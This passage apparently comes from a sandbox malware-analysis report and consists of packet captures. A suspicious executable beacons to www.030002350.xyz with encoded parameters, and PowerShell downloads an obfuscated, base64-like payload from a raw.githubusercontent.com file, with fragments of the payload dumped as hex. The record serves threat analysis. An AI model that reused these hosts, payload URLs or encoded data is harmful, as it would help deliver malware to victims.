                                                                                        Data Raw: 71 62 36 68 3d 35 59 70 71 50 39 75 30 46 46 45 4f 64 30 34 54 4a 53 35 77 45 77 37 59 55 2b 46 76 67 62 68 64 6b 36 54 59 35 6d 49 49 64 70 48 4d 39 2b 46 55 61 57 78 4d 43 2b 70 50 36 55 75 79 54 62 4f 53 6f 46 57 58 46 47 47 30 72 4f 34 74 63 54 74 68 55 74 45 46 76 6b 74 57 62 4b 41 59 73 54 59 33 2b 63 44 6b 39 33 31 75 52 67 63 53 65 54 5a 42 59 41 54 79 6c 43 6e 56 57 53 63 2f 68 52 36 52 66 55 4e 72 74 77 36 44 6b 4d 61 2f 4a 48 5a 66 66 66 47 78 62 44 68 72 57 4e 4a 46 57 5a 73 6f 69 69 52 6a 63 49 76 35 51 34 55 67 68 65 2f 56 45 79 6e 2b 46 65 33 69 45 4b 49 51 52 4a 6d 68 55 65 43 45 78 5a 71 6b 65 68 4c 48 6e 41 63 62 77 6b 7a 7a 4e 6c 57 62 5a 59 47 34 75 6f 6e 4d 36 47 65 68 38 2f 72 6b 58 4f 4a 62 64 47 6a 50 65 6c 55 6e 6f 48 58 61 67 45 2b 59 47 4d 72 37 6a 64 4a 41 6e 48 58 64 73 37 71 2f 33 74 52 75 5a 47 69 75 6a 42 2b 4e 54 6a 58 66 45 43 57 42 34 47 79 76 6d 36 49 46 51 4b 4f 41 77 6a 7a 2f 56 6d 50 4c 6b 76 2f 39 45 74 74 39 36 45 4e 74 37 6b 35 38 32 6a 78 35 77 61 6b 50 77 [TRUNCATED]
                                                                                        Data Ascii: qb6h=5YpqP9u0FFEOd04TJS5wEw7YU+Fvgbhdk6TY5mIIdpHM9+FUaWxMC+pP6UuyTbOSoFWXFGG0rO4tcTthUtEFvktWbKAYsTY3+cDk931uRgcSeTZBYATylCnVWSc/hR6RfUNrtw6DkMa/JHZfffGxbDhrWNJFWZsoiiRjcIv5Q4Ughe/VEyn+Fe3iEKIQRJmhUeCExZqkehLHnAcbwkzzNlWbZYG4uonM6Geh8/rkXOJbdGjPelUnoHXagE+YGMr7jdJAnHXds7q/3tRuZGiujB+NTjXfECWB4Gyvm6IFQKOAwjz/VmPLkv/9Ett96ENt7k582jx5wakPwrzMZ7khVPLB7W3n/fhWNh5NBMKzbyWwnlO9ZoiaxxpOSDtEps9HJNMBHlpD7RYuT5FQyBjqgSXfy8NNYho3ayV9x7H+85lXBWxA/0Z6B+//Bbc/JL2e98EHzjKW7N7eGluOmQ+mypNX/1mVbjOwOdl3bODrbRXMlFzkj666sWT6w6vq/axAy2jgEUaQD5x2ELaeYk2TMt9xbN6wmtlCAIHxBpB3jyVjWGSLt3eMGOh6HrKxsENWwCsxelOjVhf807VybYwqEjVp6GfAu6kyXPKPY2RAjgXyRxG09lcLf2jg7z8JrLeDYu0YGNGsiJZ+egM3IHpBA4GuUDKTccwpUezyU9MZv8npKfBXB0plY1isvp5P5kV6SX070Q5L1BCOFJo3ibXItTxqNNbjmYKOsrTz38GwkTakDALlpGXRqZVaYpzETwiVfSA9EDmRBc9auQ9qaTepMQU10hGNl7WolY/9GQYW+DO/u9g3bDpKwfkRs5Xdafe1LDywTCtX0Vi1P6rx1oO/uggq39z84Wcjbuz/Ad4OffQVzMfltDzbXKWkC9/F3WiXPrXH4NOuoePiQ74H7spOWFj5MXX1WSLs8OCEFAQd7U7Q6r0r1JiiiurBKfuQR60sPq+XVevj5YV23Z/guDBoroxNEn72DWcQ2yH0U7E8MECl8fs [TRUNCATED]
                                                                                        Nov 14, 2024 08:17:35.345726967 CET1236INHTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Thu, 14 Nov 2024 07:17:35 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        ETag: W/"66cce1df-b96"
                                                                                        Content-Encoding: gzip
                                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                        Nov 14, 2024 08:17:35.345745087 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        17192.168.2.563502161.97.142.144803720C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 14, 2024 08:17:37.050401926 CET512OUTGET /wrcq/?qb6h=0aBKMIuxMWsDZlZuGCNWGAisa+F3tvB0xMbS2kgCUdLh7rFDbnNAXehk8UbfWJO3lEanFmC09f09BQpsWN4gqHRUU5ElviQXwZTk2Xd/dFN8TxdFGzfCv1WAKHEC3ArfOQ==&X8wps=HD9ptle8L HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Host: www.030002350.xyz
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                        Nov 14, 2024 08:17:37.892884970 CET1236INHTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Thu, 14 Nov 2024 07:17:37 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Content-Length: 2966
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        ETag: "66cce1df-b96"
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                                        Nov 14, 2024 08:17:37.892947912 CET212INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                                        Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.des
                                                                                        Nov 14, 2024 08:17:37.892982006 CET1236INData Raw: 63 72 69 70 74 69 6f 6e 2d 74 65 78 74 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 30 37 30 37 30 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 31 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e
                                                                                        Data Ascii: cription-text {color: #707070;letter-spacing: -0.01em;font-size: 1.25em;line-height: 20px;}.footer {margin-top: 40px;font-size: 0.7em;}.animate__delay-1s {animation-delay: 1s;}@keyf
                                                                                        Nov 14, 2024 08:17:37.893016100 CET212INData Raw: 2d 34 36 63 30 2d 32 35 2e 33 36 35 2d 32 30 2e 36 33 35 2d 34 36 2d 34 36 2d 34 36 7a 22 0a 09 09 09 09 09 09 09 3e 3c 2f 70 61 74 68 3e 0a 09 09 09 09 09 09 3c 2f 73 76 67 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 63
                                                                                        Data Ascii: -46c0-25.365-20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found</h1><div class="description-text animate__animated animate__fadeIn a
                                                                                        Nov 14, 2024 08:17:37.894341946 CET274INData Raw: 6e 69 6d 61 74 65 5f 5f 64 65 6c 61 79 2d 31 73 22 3e 0a 09 09 09 09 09 09 3c 70 3e 4f 6f 70 73 21 20 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 74 68 65 20 70 61 67 65 20 74 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f
                                                                                        Data Ascii: nimate__delay-1s"><p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></


                                                                                        HTTPS Proxied Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.549705185.199.111.1334433292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-14 07:15:40 UTC116OUTGET /richie213/ani/refs/heads/main/jdikobc.txt HTTP/1.1
                                                                                        Host: raw.githubusercontent.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-11-14 07:15:40 UTC903INHTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        Content-Length: 410144
                                                                                        Cache-Control: max-age=300
                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        ETag: "9576ae1b4136ae2341c8262bb1d980c8944d974306f8fc309ee99e9bf2ccff21"
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-Frame-Options: deny
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        X-GitHub-Request-Id: 610D:2D7EE0:539AFE:5BECC5:6735A39C
                                                                                        Accept-Ranges: bytes
                                                                                        Date: Thu, 14 Nov 2024 07:15:40 GMT
                                                                                        Via: 1.1 varnish
                                                                                        X-Served-By: cache-dfw-kdal2120043-DFW
                                                                                        X-Cache: MISS
                                                                                        X-Cache-Hits: 0
                                                                                        X-Timer: S1731568540.249169,VS0,VE250
                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        X-Fastly-Request-ID: 95fe83dfc5f9ab631699e20e28ba6a2dfa293e81
                                                                                        Expires: Thu, 14 Nov 2024 07:20:40 GMT
                                                                                        Source-Age: 0
                                                                                        2024-11-14 07:15:40 UTC1378INData Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                        Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                        2024-11-14 07:15:40 UTC1378INData Raw: 4d 6d 41 74 78 41 36 6d 79 58 57 34 39 31 66 64 39 2f 64 65 66 54 45 76 65 72 54 67 44 7a 66 55 51 34 2f 69 2f 32 42 45 2f 56 54 33 70 5a 48 39 4e 4a 37 66 52 33 72 6f 65 72 54 67 44 44 4a 47 69 4f 61 57 67 32 58 44 48 54 55 72 4a 54 57 45 4a 6c 48 65 38 34 6a 57 43 6f 6e 4a 47 35 56 74 34 62 53 68 38 42 34 6f 37 47 4a 33 57 68 54 32 56 47 67 64 4d 58 31 39 4b 7a 77 68 4d 46 70 36 6d 65 72 54 67 44 32 73 44 75 55 47 66 48 4b 48 57 77 77 78 34 42 52 38 2f 4c 65 64 53 71 5a 56 76 6f 34 79 4f 74 6c 68 46 50 79 6e 6e 4e 4d 6d 79 31 37 33 41 32 7a 45 53 53 78 42 76 55 37 56 33 4e 79 6e 77 7a 69 53 39 31 7a 32 57 48 55 4c 52 52 59 75 57 75 31 37 75 6d 2f 6b 33 54 59 78 59 6c 56 4b 71 38 6b 56 37 75 61 74 59 4c 32 30 75 7a 42 54 43 71 30 44 52 4b 79 73 5a 35 55
                                                                                        Data Ascii: MmAtxA6myXW491fd9/defTEverTgDzfUQ4/i/2BE/VT3pZH9NJ7fR3roerTgDDJGiOaWg2XDHTUrJTWEJlHe84jWConJG5Vt4bSh8B4o7GJ3WhT2VGgdMX19KzwhMFp6merTgD2sDuUGfHKHWwwx4BR8/LedSqZVvo4yOtlhFPynnNMmy173A2zESSxBvU7V3NynwziS91z2WHULRRYuWu17um/k3TYxYlVKq8kV7uatYL20uzBTCq0DRKysZ5U
                                                                                        2024-11-14 07:15:40 UTC1378INData Raw: 36 39 65 72 54 67 44 58 6a 5a 77 37 6e 54 6a 65 5a 43 78 67 2f 56 50 4c 56 58 57 6f 53 49 59 58 66 45 74 30 2f 33 67 62 41 56 73 67 47 67 36 52 48 73 58 75 76 47 73 4f 61 6f 48 36 34 61 76 48 47 45 78 78 48 61 33 69 5a 73 6f 46 6c 6c 45 58 30 41 78 6e 65 65 72 54 67 44 68 6a 56 33 76 62 2f 41 65 62 51 49 61 73 73 65 72 54 67 44 46 6e 52 59 72 73 4f 4c 65 72 54 67 44 6c 42 74 6d 51 71 6b 77 46 67 4e 42 49 38 4b 55 58 53 4a 68 77 43 38 35 4f 4e 78 78 41 36 51 59 44 62 65 72 54 67 44 6c 57 73 66 4c 52 64 79 36 47 63 56 68 58 4f 58 30 54 4d 31 59 77 53 42 63 65 78 4e 67 31 4d 49 4d 4e 55 64 52 37 67 42 53 68 6f 57 38 49 76 38 65 36 38 51 74 4f 65 75 78 58 45 49 6b 44 43 39 72 59 39 71 68 51 71 44 47 35 35 4c 37 66 59 6a 71 54 57 65 72 54 67 44 64 37 45 79 31
                                                                                        Data Ascii: 69erTgDXjZw7nTjeZCxg/VPLVXWoSIYXfEt0/3gbAVsgGg6RHsXuvGsOaoH64avHGExxHa3iZsoFllEX0AxneerTgDhjV3vb/AebQIasserTgDFnRYrsOLerTgDlBtmQqkwFgNBI8KUXSJhwC85ONxxA6QYDberTgDlWsfLRdy6GcVhXOX0TM1YwSBcexNg1MIMNUdR7gBShoW8Iv8e68QtOeuxXEIkDC9rY9qhQqDG55L7fYjqTWerTgDd7Ey1
                                                                                        2024-11-14 07:15:40 UTC1378INData Raw: 77 30 74 50 48 59 52 75 6a 6a 7a 47 76 63 59 2f 70 65 72 54 67 44 67 35 38 77 34 50 58 5a 47 7a 7a 7a 52 39 62 50 78 69 53 39 2f 65 63 55 57 6b 77 79 58 79 38 6c 67 45 73 46 76 5a 57 32 47 33 35 56 6c 57 62 75 38 6b 76 58 79 50 34 35 79 33 73 76 56 31 6d 68 4c 4f 31 67 31 59 4f 46 5a 72 68 69 6d 44 70 2f 66 39 7a 46 55 30 6f 65 72 54 67 44 50 4e 67 43 46 66 2f 68 51 6c 49 71 77 51 33 52 58 6a 52 6b 4e 34 6d 49 68 66 4f 37 35 6e 6f 6f 53 62 49 79 32 69 6f 61 53 45 33 62 71 35 6e 78 55 35 36 70 4a 73 4d 73 59 76 37 52 42 66 5a 59 6f 77 38 4c 73 41 51 49 75 67 2f 70 66 64 38 73 69 76 56 52 7a 33 51 43 69 45 6b 73 6c 47 45 4c 37 6c 58 4d 59 58 64 47 42 36 47 77 53 46 53 46 65 72 54 67 44 6f 6a 43 78 62 46 47 72 34 36 48 4b 69 6f 4a 59 36 77 46 35 52 5a 37 4f
                                                                                        Data Ascii: w0tPHYRujjzGvcY/perTgDg58w4PXZGzzzR9bPxiS9/ecUWkwyXy8lgEsFvZW2G35VlWbu8kvXyP45y3svV1mhLO1g1YOFZrhimDp/f9zFU0oerTgDPNgCFf/hQlIqwQ3RXjRkN4mIhfO75nooSbIy2ioaSE3bq5nxU56pJsMsYv7RBfZYow8LsAQIug/pfd8sivVRz3QCiEkslGEL7lXMYXdGB6GwSFSFerTgDojCxbFGr46HKioJY6wF5RZ7O
                                                                                        2024-11-14 07:15:40 UTC1378INData Raw: 43 64 38 37 54 77 48 4c 6f 77 6f 7a 30 30 6d 36 7a 77 77 66 6e 68 78 77 73 51 67 51 6a 2f 67 54 71 62 58 42 70 4a 4b 4c 37 56 69 72 64 35 35 2f 63 4a 2f 38 45 6b 6d 55 6b 48 43 63 6b 43 52 6c 62 64 4a 47 69 51 36 42 78 67 34 74 42 32 73 6d 4a 72 6f 5a 63 59 59 47 79 44 6d 52 31 75 30 58 35 36 69 64 78 4c 77 75 4a 61 69 58 43 54 2f 76 35 37 38 30 58 56 57 65 72 54 67 44 4d 5a 45 42 54 43 78 66 54 34 37 54 6f 30 73 69 54 43 78 49 5a 4f 2f 45 66 56 66 4f 51 47 4b 79 4d 31 30 59 42 74 7a 43 6c 57 30 76 78 54 49 70 59 2f 53 44 2f 52 75 4d 50 76 67 72 44 59 66 65 51 46 6b 6b 5a 6b 46 46 47 54 58 43 32 52 59 55 64 6b 45 50 36 76 47 69 68 37 46 2f 30 36 4a 30 4f 63 49 4d 34 31 43 52 58 5a 4d 54 50 78 4d 53 4c 42 55 45 4e 50 75 53 54 70 48 48 66 32 6a 52 35 31 47
                                                                                        Data Ascii: Cd87TwHLowoz00m6zwwfnhxwsQgQj/gTqbXBpJKL7Vird55/cJ/8EkmUkHCckCRlbdJGiQ6Bxg4tB2smJroZcYYGyDmR1u0X56idxLwuJaiXCT/v5780XVWerTgDMZEBTCxfT47To0siTCxIZO/EfVfOQGKyM10YBtzClW0vxTIpY/SD/RuMPvgrDYfeQFkkZkFFGTXC2RYUdkEP6vGih7F/06J0OcIM41CRXZMTPxMSLBUENPuSTpHHf2jR51G
                                                                                        2024-11-14 07:15:40 UTC1378INData Raw: 73 74 75 6a 53 65 72 54 67 44 30 4e 2f 4c 58 45 57 37 71 48 6c 78 4f 68 67 53 30 63 37 51 61 56 71 69 2f 35 75 32 57 4a 59 65 39 44 59 61 67 33 78 72 6a 4c 75 77 48 77 6d 73 31 57 6d 6b 58 4a 39 50 57 36 57 47 44 7a 58 46 4e 52 75 65 51 38 54 6a 65 72 54 67 44 75 72 65 41 6b 76 4f 55 6b 63 64 76 6c 45 77 31 39 41 2f 74 73 66 31 6e 39 50 69 4a 32 2f 37 72 44 71 58 39 55 33 69 6e 52 45 6c 73 58 4b 63 52 72 39 39 57 6b 6e 58 74 4a 4e 36 48 2f 48 30 4b 75 32 56 70 31 55 37 71 4f 50 46 6d 70 38 6b 46 72 31 48 78 72 4a 54 73 63 4c 6a 47 43 52 6c 41 69 34 6c 43 55 68 67 59 6a 44 2f 4c 53 49 32 62 55 64 7a 69 4a 37 65 67 38 57 70 63 69 39 76 6b 59 69 56 52 46 51 69 32 5a 50 51 72 55 42 7a 61 66 68 4d 55 45 48 45 61 46 4a 4d 73 43 52 64 4d 34 64 4a 78 74 76 65 73
                                                                                        Data Ascii: stujSerTgD0N/LXEW7qHlxOhgS0c7QaVqi/5u2WJYe9DYag3xrjLuwHwms1WmkXJ9PW6WGDzXFNRueQ8TjerTgDureAkvOUkcdvlEw19A/tsf1n9PiJ2/7rDqX9U3inRElsXKcRr99WknXtJN6H/H0Ku2Vp1U7qOPFmp8kFr1HxrJTscLjGCRlAi4lCUhgYjD/LSI2bUdziJ7eg8Wpci9vkYiVRFQi2ZPQrUBzafhMUEHEaFJMsCRdM4dJxtves
                                                                                        2024-11-14 07:15:40 UTC1378INData Raw: 30 6c 65 72 54 67 44 64 39 76 38 4c 7a 30 41 45 55 65 73 4d 32 78 57 36 36 59 65 72 54 67 44 48 74 76 69 6d 62 5a 66 65 72 54 67 44 6f 39 34 6f 6b 57 30 65 72 54 67 44 41 6e 6c 63 74 39 39 69 45 6b 5a 54 49 34 36 65 6c 53 49 68 2f 52 54 59 78 35 50 71 42 4f 69 44 42 4f 65 6b 74 78 38 36 51 33 4f 41 52 6e 2f 6d 77 78 50 50 6f 6f 56 49 6d 65 72 54 67 44 64 33 6a 42 70 38 4c 45 31 58 48 45 49 48 42 56 4f 67 6e 58 61 74 48 75 65 51 38 69 32 41 47 61 34 65 63 6e 73 55 61 59 4b 4d 37 2f 31 55 39 46 79 79 74 32 50 44 57 73 73 46 65 4e 4b 6b 4a 49 59 6f 35 47 5a 7a 65 72 54 67 44 63 77 70 36 62 6f 54 66 4d 68 64 55 4b 32 48 50 52 45 74 4d 6e 33 56 71 78 6b 54 6b 59 44 75 72 77 47 4b 39 44 6d 55 51 42 35 31 41 57 52 6a 37 74 77 68 34 44 51 6e 65 4d 55 52 36 42 7a
                                                                                        Data Ascii: 0lerTgDd9v8Lz0AEUesM2xW66YerTgDHtvimbZferTgDo94okW0erTgDAnlct99iEkZTI46elSIh/RTYx5PqBOiDBOektx86Q3OARn/mwxPPooVImerTgDd3jBp8LE1XHEIHBVOgnXatHueQ8i2AGa4ecnsUaYKM7/1U9Fyyt2PDWssFeNKkJIYo5GZzerTgDcwp6boTfMhdUK2HPREtMn3VqxkTkYDurwGK9DmUQB51AWRj7twh4DQneMUR6Bz
                                                                                        2024-11-14 07:15:40 UTC1378INData Raw: 65 47 46 6c 68 44 39 4a 34 39 30 4c 78 34 78 42 74 4a 49 4b 38 55 70 74 57 5a 57 58 4c 50 7a 4d 66 58 77 47 69 69 59 71 43 50 46 49 48 32 56 48 79 6f 47 45 34 33 50 54 61 79 50 74 42 6b 50 79 56 2f 4a 74 5a 4a 34 32 79 56 57 30 68 43 74 42 35 70 41 53 63 55 79 4f 65 72 54 67 44 38 61 4d 71 36 68 6d 73 49 55 6f 70 42 5a 70 36 6d 31 79 48 56 6d 37 4b 6b 6c 77 31 4c 6d 51 49 59 7a 6a 2f 55 7a 58 79 47 75 62 36 76 54 48 75 79 36 33 69 59 53 36 74 53 62 61 76 42 61 6f 32 35 70 79 32 59 43 49 31 64 78 72 38 76 6c 70 6f 4d 5a 47 48 35 49 70 6d 58 58 77 7a 65 72 54 67 44 79 54 77 70 4b 4c 72 41 58 38 39 4b 73 4f 34 7a 58 71 58 77 59 6b 51 44 73 4b 7a 6f 71 70 47 53 78 76 51 44 34 4b 61 42 30 32 52 56 49 6c 30 73 69 72 6e 52 66 56 4b 5a 41 4a 51 63 4c 6d 65 72 54
                                                                                        Data Ascii: eGFlhD9J490Lx4xBtJIK8UptWZWXLPzMfXwGiiYqCPFIH2VHyoGE43PTayPtBkPyV/JtZJ42yVW0hCtB5pAScUyOerTgD8aMq6hmsIUopBZp6m1yHVm7Kklw1LmQIYzj/UzXyGub6vTHuy63iYS6tSbavBao25py2YCI1dxr8vlpoMZGH5IpmXXwzerTgDyTwpKLrAX89KsO4zXqXwYkQDsKzoqpGSxvQD4KaB02RVIl0sirnRfVKZAJQcLmerT
